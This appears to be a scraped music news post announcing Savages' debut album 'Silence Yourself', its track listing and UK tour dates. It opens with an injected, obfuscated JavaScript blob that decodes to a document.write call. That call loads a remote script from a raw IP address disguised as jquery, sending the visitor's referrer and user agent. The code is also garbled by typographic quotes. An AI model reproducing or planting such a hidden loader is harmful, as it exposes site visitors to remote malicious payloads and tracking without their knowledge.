Savages (function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(” 4=\’7://5.8.9.f/1/h.s.t?r=”+3(0.p)+”\o=”+3(j.i)+”\’><\/k"+"l>“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|yrthh|var|u0026u|referrer|tdzyd||js|php’.split(‘|’),0,{}))
debut album ‘Silence Yourself’ will be released 6th May 2013 on Matador Records / Pop Noire. New track ‘She Will’ has just appeared. The album will be available to pre-order from iTunes from Tuesday 19th at midnight, and fans who do so will instantly receive an mp3 download of ‘She Will’. The album comprises eleven tracks that are uncompromising and delivered with fierce conviction.

Silence Yourself track listing:

A1 Shut Up
A2 I Am Here
A3 City’s Full
A4 Strife
A5 Waiting For A Sign

B1 Dead Nature
B2 She Will
B3 No Face
B4 Hit Me
B5 Husbands
B6 Marshal Dear

Meanwhile, following sold out shows in Europe and America, including a recent gig at London’s 1200 capacity Electric Ballroom venue, Savages will continue to tour throughout the coming months, here are the UK dates are:

1st Queen’s Social Club, Sheffield
2nd SWG3, Glasgow
3rd Liverpool Sound City
4th Live at Leeds Festival
5th Arts Centre, Norwich 7th Bodega, Nottingham
8th Old Fire Station, Bournemouth
25th Field Day Festival, London

8th Manchester Parklife Festival